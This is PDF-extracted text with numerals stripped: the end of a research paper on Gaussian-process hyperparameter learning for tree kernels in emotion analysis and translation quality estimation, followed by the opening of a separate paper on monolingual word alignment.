kernels rely on recursive def- initions and dynamic programming to perform their calculations. examples include other tree kernels like the partial tree kernel (moschitti, a) and string kernels like the ones defined on character n- grams (lodhi et al., ) or word sequences (can- cedda et al., ). while in this paper we focus on the sstk (and our proposed sasstk), our ap- proach can easily be extended to these other kernels, as long as all the corresponding recursive definitions are differentiable. synthetic data experiments a natural question that arises in the proposed method is how much data is needed to accurately learn the kernel hyperparameters. to answer this question, we run a set of experiments using synthetic data. we generate this data by using a set of natural language syntactic trees, where we fix a ran- dom subset of instances for testing and use the remaining instances as training. for each train- ing set size we define a gp over the full dataset, sam- ple a function from it and use the function output as the response variable for each tree. we try two dif- ferent gp priors, one using the sstk and another one using the sasstk. the conditions above provide a controlled envi- ronment to check the modelling capacities of our ap- proach since we know the exact distribution where the data comes from. the reasoning behind these experiments is that to be able to provide benefits in real tasks, where the data distribution is not known, our models have to be learnable in this controlled setting as well using a reasonable amount of data. finally, we also provide an empirical evaluation comparing the speed performance between our ap- proach and grid search. . sstk prior our first experiments use a sstk as the kernel with λ = . ,α = and σ n = . . after obtaining the input trees and their sampled labels, we define a new gp model using only the training data plus the obtained response variables, this time using a sstk with randomized hyperparameter values. then we optimize the gp and check if the learned hyperpa- rameters are close to the original ones, using ran- dom restarts to limit the effect of local optima. we also use the optimized gp to predict response vari- ables on the test set and measure root mean squared error (rmse). our hypothesis is that with a reason- able sample size we can retrieve the original hyper- parameter values and obtain low rmse. for each training set size, we repeat the experiment times. figure shows the results of these experiments. for small sizes the variance in the resulting hyperpa- rameter values is large but as soon as we reach instances we are able to retrieve the original values with high confidence. in other words, in an ideal set- ting instances are enough to learn the kernel. it is also interesting to note that test rmse after opti- mization steadily decreases as we increase training data size. this shows that if one is more interested in predictions themselves, it is still worth optimizing hyperparameters even if the training data is small. figure : results of synthetic experiments optimizing sstk. the x axes correspond to different training set sizes and the the y axes are the obtained hyperparame- ter values in the first three plots and rmse in the last plot. dashed lines show the original hyperparameter val- ues. points are offset in rmse chart for legibility. . sasstk prior the large number of hyperparameters of the sasstk makes it more prone to optimization and overfitting issues when compared to the sstk. this raises the question of how much data is needed to justify its use. to address this question, we run sim- ilar experiments to those above for the sstk, except that now we sample from a gp using a sasstk as the kernel. instead of optimizing all hyperparameters freely we use a simpler version where we tie λ and α for each symbol to the same value, except for the sym- bol ’s’. effectively this version has one extra λ and one extra α (henceforth λs and αs) when compared to the sstk. the gp prior hyperparameter values are set to λ = . ,λs = . ,α = . ,αs = and σ n = . . for each training set size, we train two gps, one using this sasstk and one using the original sstk, optimize them using random restarts and measure rmse on the test set. results are shown in figure . for all training set sizes the sasstk reaches lower rmse than sstk, with a substantial difference after reaching in- stances. this shows that even for small datasets our proposed kernel manages to capture aspects which can not be explained by the original sstk. note that this is an ideal setting, and real datasets may need to be larger to realize gains from sasstk. neverthe- less, these are promising results since they give evi- dence of a small lower bound on the dataset size for sasstk to be effective. figure : results from synthetic experiments comparing sstk and sasstk. the x axis is training set size while the y axis corresponds to rmse. . performance experiments to provide an overview of how efficient is the gradient-based method compared to grid search we also run a set of experiments measuring wall clock training time vs. rmse on a test set. for both gp and svm models we employ the sstk as the kernel and we use the same synthetic data from the previ- ous experiments . we perform runs, keeping the test set as the same instances for all runs and randomly sampling instances from the remain- ing instances as training data. figure shows the curves for both gp and svm models. the gp curve is obtained by increasing the maximum number of iterations of the gradient-based method (in this case, l-bfgs) and the svm curve is obtained by increasing the granularity of the grid size. figure : results from performance experiments. the x axis corresponds to wall clock time in seconds and it is in log scale. the y axis shows rmse on the test set. the blue dashed line corresponds to the rmse value obtained after l-bfgs converged. error bars are obtained by mea- suring one standard deviation over the runs made in each experiment. we can see that optimizing the gp model is con- sistently much faster than doing grid search on the svm model (notice the logarithmic scale), even though it shows some variance when letting l-bfgs run for a larger number of iterations. the gp model also is able to better predictions in general. even when taking the variances into account, grid search would still need around times more computation for specific details on the svm models used in all experi- ments performed in this paper we refer the reader to appendix a. time to achieve the same predictions obtained by the gp model. in real settings, svms predictions tend to be more on par with the ones provided by a gp (as shown in § ) but nevertheless these figures show that the gp can be much more time efficient when optimizing hyperparameters of a tree kernel. an important performance aspect to take into ac- count is parallelization. grid search is embarass- ingly parallelizable since each grid point can run in a different core. however, the gp optimization can also benefit from multiple cores by running each ker- nel computation inside the gram matrix in parallel. to keep the comparisons simpler, the results shown in this section use a single core but all experiments in § employ parallelization in the gram matrix com- putation level (for both svm and gp models). nlp experiments our experiments with nlp data address two regres- sion tasks: emotion analysis and quality estima- tion. for both tasks, we use the stanford parser (manning et al., ) to obtain constituency trees for all sentences. also, rather than using data official splits, we perform -fold cross-validation in order to obtain more reliable results. . emotion analysis the goal of emotion analysis is to automatically de- tect emotions in a text (strapparava and mihalcea, ). this problem is closely related to opinion mining (pang and lee, ), with similar appli- cations, but it is usually done at a more fine-grained level and involves the prediction of a set of labels for each text (one for each emotion) instead of a single label. beck et al. ( a) used a multi-task gp for this task with a bag-of-words feature representation. in theory, it is possible to combine their multi-task ker- nel with our tree kernels, but to keep the focus of the experiments on testing tree kernel approaches, here we use independently trained models, one per emo- tion. dataset we use the dataset provided by the “af- fective text” shared task in semeval (strap- parava and mihalcea, ), which is composed of news headlines annotated in terms of six emo- tions: anger, disgust, fear, joy, sadness and sur- prise. for each emotion, a score between and is given, meaning total lack of emotion and , maximally emotional. scores are mean-normalized before training the models. models we perform experiments using the follow- ing tree kernels: • sstk: the sstk formulation introduced by moschitti ( b); • sasstkfull: our proposed symbol-aware sstk; • sasstks: same as before, but using only two λ and two α hyperparameters: one for sym- bols corresponding to full sentences and an- other for all other symbols. this configuration is similar to that in section . . for all kernels, we also use a variation fixing the α hyperparameters to to emulate the original sstk. baselines and evaluation our results are com- pared against three baselines: • svm sstk: a svm using an sstk kernel. • svm bow: same as before, but using an rbf kernel with a bag-of-words representation. • gp bow: same as svm bow but using a gp instead. the svm models are trained using a wrapper for libsvm (chang and lin, ) provided by the scikit-learn toolkit (pedregosa et al., ) and op- timized via grid search. following previous work, we use pearson’s correlation coefficient as evalua- tion metric. pearson’s scores are obtained by con- catenating all six emotions outputs together. table shows the results. the best gp model with tree kernels outperforms the svms, showing that the fine-grained model selection procedure pro- vided by the gp models is helpful when dealing with tree kernels. however, using the sasstk models do not help in the case of free α and the sasstkfull actually performs worse than the original sstk, in this dataset, symbols are s, sq, sbarq and sinv . http://www.csie.ntu.edu.tw/˜cjlin/ libsvm http://scikit-learn.org even though the optimized marginal likelihood was higher. this is evidence that the sasstkfull model is overfitting the training data, probably due to its large number of hyperparameters. pearson’s svm bow . svm sstk . gp bow . (free α) gp sstk . gp sasstkfull . gp sasstks . (fixed α = ) gp sstk . gp sasstkfull . gp sasstks . table : pearson’s correlation scores for the emotion analysis task (higher is better). another interesting finding in table is that fix- ing the α values often harms performance. inspect- ing the free α models showed that the values found by the optimizer were very close to zero. this in- dicates that the model selection procedure prefer towards giving smaller weights to incomplete tree fragments. we can interpret this as the model se- lecting a more lexicalized feature space, which also explains why the gp rbf model on bag-of-words performed the best in this task. finally, to understand how the optimized kernels could provide more interpretability, table shows the top λ values obtained by the sasstkfull (fixed α variant) with their corresponding symbols. in this specific case the kernel does not give the best performance so there are limitations in doing a full linguistic analysis. nevertheless, we believe this ex- ample shows the potential for developing more in- terpretable kernels. this is especially interesting be- cause these models take into account a much richer feature space than what it is allowed by parametric models. . quality estimation the goal of quality estimation is to provide a qual- ity prediction for new, unseen machine translated texts (blatz et al., ; bojar et al., ). exam- http://www.csie.ntu.edu.tw/~cjlin/libsvm http://www.csie.ntu.edu.tw/~cjlin/libsvm http://scikit-learn.org jjr . whadvp . vbp . prp$ . qp . whnp . wdt . jjs . nn . rbr . nns . jj . vbg . . . sq . table : top symbols sorted according to their ob- tained λ values in the sasstkfull model with fixed α. the numbers are the corresponding λ values, averaged over all six emotions. ples of applications include filtering machine trans- lated sentences that would require more post-editing effort than translation from scratch (specia et al., ), selecting the best translation from different mt systems (specia et al., ) or between an mt system and a translation memory (he et al., ), and highlighting segments that need revision (bach et al., ). while various quality metrics exist, here we focus on post-editing time prediction. tree kernels have been used before in this task (with svms) by hardmeier ( ) and hardmeier et al. ( ). while their best models combine tree kernels with a set of explicit features, they also show good results using only the tree kernels. this makes quality estimation a good benchmark task to test our models. datasets we use two publicly available datasets containing post-edited machine translated sentences. both are composed of a set of source sentences, their machine translated outputs and the corresponding post-editing time. • french-english (fr-en): this dataset, de- scribed in (specia, ), contains french sentences translated into english and post- edited by a novice translator. • english-spanish (en-es): this dataset was used in the wmt quality estimation shared task (bojar et al., ), containing sen- tences translated from english into spanish and post-edited by an expert translator. for each dataset, post-editing times are first di- vided by the translation output length (obtaining the post-editing time per word) and then mean normal- ized. models since our data consists of pairs of trees, our models in this task use a pair of tree kernels. we combine these two kernels by either summing or multiplying them. as for underlying tree ker- nels, we try both sstk and sasstks. as in the emotion analysis task, we also experiment with a set of kernel configurations with the α hyperparam- eters fixed at . we also test models that combine our tree kernels with an rbf kernel on a set of features extracted using the quest framework (spe- cia et al., ). these features are part of a strong baseline model used by the wmt shared task. baselines and evaluation we compare our results with a number of svm models: • svm sstk: same as in the emotion analysis task, using either a sum (+) or a product (×) of sstks. • svm rbf: this is an svm trained on the features extracted by quest. • svm rbf sstk: a combination of the two models above. for further comparison, we also show results ob- tained using a gp model and an rbf kernel on the quest-only features. following previous work, we measure prediction performance using both mean absolute error (mae) and rmse. the prediction results are given in table . they indicate a number of interesting findings: • for the fr-en dataset, the gp models combining tree kernels with an rbf kernel outperform all other models. results for the en-es dataset are less consistent, probably due to the small size of the dataset, but on average they are better than their svm counterparts. • the svms using a combination of kernels performs worse than using the rbf kernel alone. inspecting the models, we found that grid search actually harms performance. for instance, for the fr-en dataset, mae and rmse for the rbf + sstk × model before grid search are . and . , respectively. on the other hand, for this dataset all gp models achieve better results after optimization. • unlike in the emotion analysis task, fixing α results in better performance, even though the resulting models have lower marginal likeli- hood than the ones with free α. the same effect happened when comparing the sasstk mod- els with the sstk ones for the en-es dataset. both cases are evidence of model overfitting. french-english english-spanish mae rmse mae rmse (svm) rbf . . . . sstk + . . . . sstk × . . . . rbf sstk + . . . . rbf sstk × . . . . gp rbf . . . . (gp free α) sstk + . . . . sstk × . . . . sasstks + . . . . sasstks × . . . . (gp fixed α = ) sstk + . . . . sstk × . . . . sasstks + . . . . sasstks × . . . . (gp fixed α = ) rbf sstk + . . . . rbf sstk × . . . . rbf sasstks + . . . . rbf sasstks × . . . . table : error scores for the quality estimation task (lower is better). results are in terms of post-editing time per word. bold scores are the best ones for each dataset. we also inspect the resulting hyperparameters to obtain insights about the features used by the model. table shows the optimized λ values for the gp sstk models with fixed α for the fr-en dataset. the λ values obtained are higher for the target sentence kernels than for the source sentence ones. we can interpret this as the model giving preference to fea- tures from the target trees instead of the source trees, which is what we would expect for this task. . overfitting both nlp tasks show evidence that the gp models with large number of hyperparameters (sasstkfull in the case of emotion analysis and the free α mod- els in quality estimation) are overfitting the cor- responding datasets. while the bayesian formula- λsrc λtgt gp sstk + . . gp sstk × . . table : learned hyperparameters for the gp sstk mod- els in the fr-en dataset, with α fixed at . λsrc and λtgt are the hyperparameters corresponding to the kernels on the source and target parse trees, respectively. the values shown are averaged over the cross-validation results. tion for the marginal likelihood does help limiting overfitting, it does not prevent it completely. small datasets or invalid assumptions about the gaussian distribution of the data may still lead to poorly fitting models. another means of reducing overfitting is by taking a fully bayesian approach in which hyperpa- rameters are considered as random variables and are marginalized out (osborne, ); this is a research direction we plan to pursue in the future. . extensions to other tasks the gp framework introduced in section can be extended to non-regression problems by chang- ing the likelihood function. for instance, models for classification (rasmussen and williams, , chap. ), ordinal regression (chu and ghahramani, ) and structured prediction (altun et al., ; bratières et al., ) were proposed in the liter- ature. since the likelihood is independent of the kernel, a natural future step is to apply the kernels and models introduced in this paper to different nlp tasks. in light of that, we did initial experiments with constituency parsing reranking. the first results were inconclusive but we do believe this is because we employed naive approaches using classification ( -best result vs. all) and regression (using parse- val metrics as the response variable) models. a more appropriate way to tackle this task is by em- ploying a reranking-based likelihood and this is a direction we plan to pursue in the future. related work interest in model selection procedures for kernel- based methods has been growing in the last years. see also rasmussen and williams ( , chap. ) for an in-depth discussion on this issue. we thank the anonymous reviewers for this suggestion. one widely used approach for that is multiple ker- nel learning (mkl) (gönen and alpaydın, ). mkl is based on the idea of using combinations of kernels to model the data and developing algo- rithms to tune the kernel coefficients. this is dif- ferent from our method, where we focus on learning the hyperparameters of a single structural kernel. an approach similar to ours was proposed by igel et al. ( ). they combine oligo kernels (a kind of n- gram kernel) with mkl, derive their gradients and optimize towards a kernel alignment metric. com- pared to our approach, they restrict the length of the n-grams being considered, while we rely on dy- namic programming to explore the whole substruc- ture space. also, their method does not take into account the underlying learning algorithm. another recent approach proposed for model selection is ran- dom search (bergstra and bengio, ). like grid search, it has the drawback of not employing gra- dient information, as it is designed for any kind of hyperparameters (including categorical ones). structural kernels have been successfully em- ployed in a number of nlp tasks. the original sstk proposed by collins and duffy ( ) was used to rerank the output of syntactic parsers. re- cently, this reranking idea was also applied to dis- course parsing (joty and moschitti, ). other tree kernel applications include semantic role la- belling (moschitti et al., ) and relation extrac- tion (plank and moschitti, ). string kernels were mostly used in text classification (lodhi et al., ; cancedda et al., ), while graph ker- nels have been used for recognizing textual entail- ment (zanzotto and dell’arciprete, ). how- ever, these previous works focused on frequentist methods like svm or voted perceptron while we employ a bayesian approach. gaussian processes are a major framework in machine learning nowadays: applications in- clude robotics (ko et al., ), geolocation (schwaighofer et al., ) and computer vision (sinz et al., ). only very recently they have been successfully employed in a few nlp tasks such as translation quality estimation (cohn and specia, ; beck et al., b), detection of temporal pat- terns in text (preoţiuc-pietro and cohn, ), se- mantic similarity (rios and specia, ) and emo- tion analysis (beck et al., a). in terms of feature representations, previous work focused on the vecto- rial inputs and applied well-known kernels for these inputs, e.g. the rbf kernel. as shown on § . , our approach is orthogonal to these previous ones, since kernels can be easily combined in different ways. it is important to note that we are not the first ones to combine gps with kernels on structured inputs. driessens et al. ( ) employed a combination of gps and graph kernels for reinforcement learning. however, unlike our approach, they did not attempt model selection, evaluating only a few hyperparam- eter values empirically. conclusions this paper describes a bayesian approach for struc- tural kernel learning, based on gaussian processes for easy model selection. experiments applying our models to synthetic data showed that it is possible to learn structural kernel hyperparameters using a fairly small amount of data. furthermore we ob- tained promising results in two nlp tasks, includ- ing quality estimation, where we beat the state of the art. finally, we showed how these rich parame- terizations can lead to more interpretable kernels. beyond empirical improvements, an important goal of this paper is to present a method that en- ables new kernel developments through the exten- sion of the number of hyperparameters. we focused on the subset tree kernel, proposing an extension and then deriving its gradients. this approach can be applied to any structural kernel, as long as gradi- ents are available. it is our hope that this work will serve as a starting point for future developments in these research directions. acknowledgements daniel beck was supported by funding from cnpq/brazil (no. / - ). dr. cohn is the recipient of an australian research council future fellowship (project number ft ). the au- thors would also like to thank the three anonymous reviewers for their helpful comments and sugges- tions. references yasemin altun, thomas hofmann, and alexander j. smola. . gaussian process classification for segmenting and annotating sequences. in proceed- ings of icml. nguyen bach, fei huang, and yaser al-onaizan. . goodness: a method for measuring machine trans- lation confidence. in proceedings of acl, pages – . daniel beck, trevor cohn, and lucia specia. a. joint emotion analysis via multi-task gaussian pro- cesses. in proceedings of emnlp, pages – . daniel beck, kashif shah, and lucia specia. b. shef-lite . : sparse multi-task gaussian processes for translation quality estimation. in proceedings of wmt , pages – . james bergstra and yoshua bengio. . random search for hyper-parameter optimization. journal of machine learning research, : – . john blatz, erin fitzgerald, and george foster. . confidence estimation for machine translation. in proceedings of the th conference on computational linguistics, pages – . ondej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint- amand, radu soricut, lucia specia, and aleš tam- chyna. . findings of the workshop on statistical machine translation. in proceedings of wmt , pages – . sébastien bratières, novi quadrianto, and zoubin ghahramani. . bayesian structured prediction using gaussian processes. arxiv: . , pages – . nicola cancedda, eric gaussier, cyril goutte, and jean- michel renders. . word-sequence kernels. the journal of machine learning research, : – . chih-chung chang and chih-jen lin. . libsvm : a library for support vector machines. acm trans- actions on intelligent systems and technology (tist), ( ): – . wei chu and zoubin ghahramani. . gaussian pro- cesses for ordinal regression. journal of machine learning research, : – . trevor cohn and lucia specia. . modelling anno- tator bias with multi-task gaussian processes: an ap- plication to machine translation quality estimation. in proceedings of acl, pages – . michael collins and nigel duffy. . convolution kernels for natural language. in proceedings of nips, pages – . kurt driessens, jan ramon, and thomas gärtner. . graph kernels and gaussian processes for relational reinforcement learning. machine learning, ( - ): – . mehmet gönen and ethem alpaydın. . multi- ple kernel learning algorithms. journal of machine learning research, : – . christian hardmeier, joakim nivre, and jörg tiedemann. . tree kernels for machine translation quality estimation. in proceedings of wmt , pages – . christian hardmeier. . improving machine trans- lation quality prediction with syntactic tree kernels. in proceedings of eamt, pages – . david haussler. . convolution kernels on discrete structures. technical report, university of california at santa cruz. yifan he, yanjun ma, josef van genabith, and andy way. . bridging smt and tm with translation recommendation. in proceedings of acl, pages – . james hensman, nicolò fusi, and neil d. lawrence. . gaussian processes for big data. in proceed- ings of uai, pages – . christian igel, tobias glasmachers, britta mersch, and nico pfeifer. . gradient-based optimization of kernel-target alignment for sequence kernels ap- plied to bacterial gene start detection. ieee/acm transactions on computational biology and bioinfor- matics, ( ): – . shafiq joty and alessandro moschitti. . discrimi- native reranking of discourse parses using tree ker- nels. in emnlp, pages – . jonathan ko, daniel j. klein, dieter fox, and dirk haehnel. . gaussian processes and reinforce- ment learning for identification and control of an au- tonomous blimp. in proceedings of ieee interna- tional conference on robotics and automation, pages – . huma lodhi, craig saunders, john shawe-taylor, nello cristianini, and chris watkins. . text classifi- cation using string kernels. the journal of machine learning research, : – . christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of acl demo session, pages – . alessandro moschitti, daniele pighin, and roberto basili. . tree kernels for semantic role label- ing. computational linguistics, pages – . alessandro moschitti. a. efficient convolution ker- nels for dependency and constituent syntactic trees. in proceedings of ecml, pages – . alessandro moschitti. b. making tree kernels practical for natural language learning. in eacl, pages – . michael osborne. . bayesian gaussian processes for sequential prediction, optimisation and quadra- ture. ph.d. thesis, university of oxford. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( ): – . fabian pedregosa, gaël varoquaux, alexandre gram- fort, vincent michel, bertrand thirion, olivier grisel, mathieu blondel, peter prettenhofer, ron weiss, vin- cent duborg, jake vanderplas, alexandre passos, david cournapeau, matthieu brucher, matthieu per- rot, and édouard duchesnay. . scikit-learn: ma- chine learning in python. journal of machine learn- ing research, : – . daniele pighin and alessandro moschitti. . on re- verse feature engineering of syntactic tree kernels. in proceedings of conll, pages – . barbara plank and alessandro moschitti. . embed- ding semantic similarity in tree kernels for domain adaptation of relation extraction. in proceedings of acl, pages – . daniel preoţiuc-pietro and trevor cohn. . a tem- poral model of text periodicities using gaussian pro- cesses. in proceedings of emnlp, pages – . carl edward rasmussen and christopher k. i. williams. . gaussian processes for machine learning, vol- ume . mit press cambridge. miguel rios and lucia specia. . uow : multi-task learning gaussian process for semantic textual sim- ilarity. in proceedings of semeval, pages – . anton schwaighofer, marian grigoras, volker tresp, and clemens hoffmann. . gpps: a gaussian pro- cess positioning system for cellular networks. in proceedings of nips, pages – . fabian h. sinz, joaquin quiñonero candela, gökhan h. bakır, carl e. rasmussen, and matthias o. franz. . learning depth from stereo. pattern recog- nition, pages – . lucia specia, nicola cancedda, marc dymetman, marco turchi, and nello cristianini. . estimating the sentence-level quality of machine translation systems. in proceedings of eamt, pages – . lucia specia, dhwaj raj, and marco turchi. . ma- chine translation evaluation versus quality estimation. machine translation, ( ): – . lucia specia, kashif shah, josé g. c. de souza, and trevor cohn. . quest - a translation quality estimation framework. in proceedings of acl demo session, pages – . lucia specia. . exploiting objective annotations for measuring translation post-editing effort. in pro- ceedings of eamt, pages – . carlo strapparava and rada mihalcea. . semeval- task : affective text. in proceedings of se- meval, pages – . carlo strapparava and rada mihalcea. . learning to identify emotions in text. in proceedings of the acm symposium on applied computing, pages – . fabio massimo zanzotto and lorenzo dell’arciprete. . efficient kernels for sentence pair classification. in proceedings of emnlp, pages – . a details on svm baselines all svm baselines employ the �-insensitve loss function. grid search optimization is done via - fold cross-validation on the respective training set and use rmse as the metric to be minimized. after obtained the best hyperparameter values, the svm is retrained using these values on the full respec- tive training set. the specific intervals used in grid search depend on the task. for the performance experiments on synthetic data, we employed an interval of [ − , ] for c (regularization coefficient) and �, [ − , ] for λ and [ − , ] for α. in each run we incrementally in- crease the size of the grid by adding intermediate values on each interval. we keep a linear scale for the sstk hyperparameters and a logarithmic scale for c and �. as an example, table shows the re- sulting grids when the grid value is for each hyper- parameter. for all nlp experiments the grid is fixed for all hyperparameters (including γ, the lengthscale value in the rbf kernel), with its corresponding val- ues shown on table . c / � [ − , − , , ] λ [ − , . , . , ] α [ − , . , . , ] table : resulting grids for the performance experiments when grid size is set to for each hyperparameter. c [ − , , ] � [ − , − , , ] λ [ − , . , . ] α [ ] (fixed) γ [ − , . , . , . , ] table : grid values for the nlp experiments. back to basics for monolingual alignment: exploiting word similarity and contextual evidence back to basics for monolingual alignment: exploiting word similarity and contextual evidence md arafat sultan†, steven bethard‡ and tamara sumner† †institute of cognitive science and department of computer science university of colorado boulder ‡department of computer and information sciences university of alabama at birmingham arafat.sultan@colorado.edu, bethard@cis.uab.edu, sumner@colorado.edu abstract we present a simple, easy-to-replicate monolin- gual aligner that demonstrates state-of-the-art performance while relying on almost no su- pervision and a very small number of external resources. based on the hypothesis that words with similar meanings represent potential pairs for alignment if located in similar contexts, we propose a system that operates by finding such pairs. in two intrinsic evaluations on alignment test data, our system achieves f scores of – %, demonstrating – % absolute improve- ment over the previous best system. moreover, in two extrinsic evaluations our aligner out- performs existing aligners, and even a naive application of the aligner approaches state-of- the-art performance in each extrinsic task. introduction monolingual alignment is the task of discovering and aligning similar semantic units in a pair of sentences expressed in a natural language. such alignments pro- vide valuable information regarding how and to what extent the two sentences are related. consequently, alignment is a central component of a number of important tasks involving text comparison: textual entailment recognition, textual similarity identifica- tion, paraphrase detection, question answering and text summarization, to name a few. the high utility of monolingual alignment has spawned significant research on the topic in the re- cent past. major efforts that have treated alignment as a standalone problem (maccartney et al., ; thadani and mckeown, ; yao et al., a) are primarily supervised, thanks to the manually aligned corpus with training and test sets from microsoft re- search (brockett, ). primary concerns of such work include both quality and speed, due to the fact that alignment is frequently a component of larger nlp tasks. driven by similar motivations, we seek to devise a lightweight, easy-to-construct aligner that produces high-quality output and is applicable to various end tasks. amid a variety of problem formulations and ingenious approaches to alignment, we take a step back and examine closely the effectiveness of two frequently made assumptions: ) related semantic units in two sentences must be similar or related in their meaning, and ) commonalities in their se- mantic contexts in the respective sentences provide additional evidence of their relatedness (maccartney et al., ; thadani and mckeown, ; yao et al., a; yao et al., b). alignment, based solely on these two assumptions, reduces to finding the best combination of pairs of similar semantic units in sim- ilar contexts. exploiting existing resources to identify similarity of semantic units, we search for robust techniques to identify contextual commonalities. dependency trees are a commonly used structure for this purpose. while they remain a central part of our aligner, we expand the horizons of dependency-based alignment beyond exact matching by systematically exploiting the notion of “type equivalence” with a small hand- crafted set of equivalent dependency types. in addi- tion, we augment dependency-based alignment with surface-level text analysis. while phrasal alignments are important and have transactions of the association for computational linguistics, ( ) – . action editor: alexander koller. submitted / ; revised / ; published / . c© association for computational linguistics. been investigated in multiple studies, we focus pri- marily on word alignments (which have been shown to form the vast majority of alignments (≥ %) in multiple human-annotated corpora (yao et al., b)), keeping the framework flexible enough to allow incorporation of phrasal alignments in future. evaluation of our aligner on the benchmark dataset reported in (brockett, ) shows an f score of . %: a . % absolute improvement over the previ- ous best system (yao et al., a), corresponding to a . % error reduction. it shows superior perfor- mance also on the dataset reported in (thadani et al., ). additionally, we present results of two extrinsic evaluations, namely textual similarity iden- tification and paraphrase detection. our aligner not only outperforms existing aligners in each task, but also approaches top systems for the extrinsic tasks. background monolingual alignment has been applied to various nlp tasks including textual entailment recognition (hickl et al., ; hickl and bensley, ), para- phrase identification (das and smith, ; madnani et al., ), and textual similarity assessment (bär et al., ; han et al., ) – in some cases ex- plicitly, i.e., as a separate module. but many such systems resort to simplistic and/or ad-hoc strategies for alignment and in most such work, the alignment modules were not separately evaluated on alignment benchmarks, making their direct assessment difficult. with the introduction of the msr alignment cor- pus (brockett, ) developed from the second recognizing textual entailment challenge data (bar- haim et al., ), direct evaluation and comparison of aligners became possible. the first aligner trained and evaluated on the corpus was a phrasal aligner called manli (maccartney et al., ). it repre- sents alignments as sets of different edit operations (where a sequence of edits turns one input sentence into the other) and finds an optimal set of edits via a simulated annealing search. weights of different edit features are learned from the training set of the msr alignment corpus using a perceptron learning algorithm. manli incorporates only shallow fea- tures characterizing contextual similarity: relative positions of the two phrases being aligned (or not) in the two sentences and boolean features representing whether or not the preceding and following tokens of the two phrases are similar. thadani and mckeown ( ) substituted manli’s simulated annealing-based decoding with integer linear programming, and achieved a consider- able speed-up. more importantly for our discussion, they found contextual evidence in the form of syn- tactic constraints useful in better aligning stop words. thadani et al. ( ) further extended the model by adding features characterizing dependency arc edits, effectively bringing stronger influence of contextual similarity into alignment decisions. again the perfor- mance improved consequently. the most successful aligner to date both in terms of accuracy and speed, called jacanaalign, was de- veloped by yao et al. ( a). in contrast to the earlier systems, jacanaalign is a word aligner that formulates alignment as a sequence labeling prob- lem. each word in the source sentence is labeled with the corresponding target word index if an align- ment is found. it employs a conditional random field to assign the labels and uses a feature set similar to manli’s in terms of the information they encode (with some extensions). contextual features include only semantic match of the left and the right neigh- bors of the two words and their pos tags. even though jacanaalign outperformed the manli en- hancements despite having less contextual features, it is difficult to compare the role of context in the two models because of the large paradigmatic dispar- ity. an extension of jacanaalign was proposed for phrasal alignments in (yao et al., b), but the contextual features remained largely unchanged. noticeable in all the above systems is the use of contextual evidence as a feature for alignment, but in our opinion, not to an extent sufficient to harness its full potential. even though deeper dependency- based modeling of contextual commonalities can be found in some other studies (kouylekov and magnini, ; chambers et al., ; chang et al., ; yao et al., c), we believe there is further scope for systematic exploitation of contextual evidence for alignment, which we aim to do in this work. on the contrary, word semantic similarity has been a central component of most aligners; various mea- sures of word similarity have been utilized, including string similarity, resource-based similarity (derived from one or more lexical resources like wordnet) align identical word sequences align named entities align content words align stop words figure : system overview and distributional similarity (computed from word co-occurrence statistics in large corpora). an impor- tant trade-off between precision, coverage and speed exists here and aligners commonly rely on only a subset of these measures (thadani and mckeown, ; yao et al., a). we use the paraphrase database (ppdb) (ganitkevitch et al., ), which is a large resource of lexical and phrasal paraphrases constructed using bilingual pivoting (bannard and callison-burch, ) over large parallel corpora. system our system operates as a pipeline of alignment mod- ules that differ in the types of word pairs they align. figure is a simplistic representation of the pipeline. each module makes use of contextual evidence to make alignment decisions. in addition, the last two modules are informed by a word semantic similarity algorithm. because of their phrasal nature, we treat named entities separately from other content words. the rationale behind the order in which the modules are arranged is discussed later in this section ( . . ). before discussing each alignment module in de- tail, we describe the system components that identify word and contextual similarity. . word similarity the ability to correctly identify semantic similarity between words is crucial to our aligner, since con- textual evidence is important only for similar words. instead of treating word similarity as a continuous variable, we define three levels of similarity. the first level is an exact word or lemma match which is represented by a similarity score of . the second level represents semantic similarity between two terms which are not identical. to identify such word pairs, we employ the paraphrase database (ppdb) . we use the largest (xxxl) of the ppdb’s lexical paraphrase packages and treat all pairs iden- tically by ignoring the accompanying statistics. we http://paraphrase.org customize the resource by removing pairs of identi- cal words or lemmas and adding lemmatized forms of the remaining pairs. for now, we use the term ppdbsim to refer to the similarity of each word pair in this modified version of ppdb (which is a value in ( , )) and later explain how we determine it (section . . ). finally, any pair of different words which is absent in ppdb is assigned a zero similarity score. . extracting contextual evidence our alignment modules collect contextual evidence from two complementary sources: syntactic depen- dencies and words occurring within a small textual vicinity of the two words to be aligned. the applica- tion of each kind assumes a common principle of min- imal evidence. formally, given two input sentences s and t , we consider two words s ∈ s and t ∈ t to form a candidate pair for alignment if ∃rs ∈ s and ∃rt ∈ t such that: . (s,t) ∈ <sim and (rs,rt) ∈ <sim, where <sim is a binary relation indicating sufficient semantic relatedness between the members of each pair (≥ ppdbsim in our case). . (s,rs) ∈ <c and (t,rt) ∈ <c , such that <c ≈<c ; where <c and <c are binary re- lations representing specific types of contextual relationships between two words in a sentence (e.g., an nsubj dependency between a verb and a noun). the symbol ≈ represents equivalence between two relationships, including identical- ity. note that the minimal-evidence assumption holds a single piece of contextual evidence as sufficient support for a potential alignment; but as we discuss later in this section, an evidence for word pair (s,t) (where s ∈ s and t ∈ s) may not lead to an align- ment if there exists a competing pair (s′, t) or (s,t′) with more evidence (where s′ ∈ s and t′ ∈ t ). in the rest of this section, we elaborate the different forms of contextual relationships we exploit along with the notion of equivalence between relationships. . . syntactic dependencies dependencies can be important sources of con- textual evidence. two nsubj children rs and rt of two verbs s ∈ s and t ∈ t , for example, pro- vide evidence for not only an (s,t) alignment, but s: he wrote a book . nsubj dobj det t : i read the book he wrote . nsubj dobj det rcmod nsubj figure : equivalent dependency types: dobj and rcmod also an (rs,rt) alignment if (s,t) ∈ <sim and (rs,rt) ∈ <sim. (we adopt the stanford typed de- pendencies (de marneffe and manning, ).) moreover, dependency types can exhibit equiva- lence; consider the two sentences in figure . the dobj dependency in s is equivalent to the rcmod dependency in t (dobj ≈ rcmod, following our ear- lier notation) since they represent the same semantic relation between identical word pairs in the two sen- tences. to be able to use such evidence for alignment, we need to go beyond exact matching of dependen- cies and develop a mapping among dependency types that encodes such equivalence. note also that the parent-child roles are opposite for the two depen- dency types in the above example, a scenario that such a mapping must accommodate. the four possible such 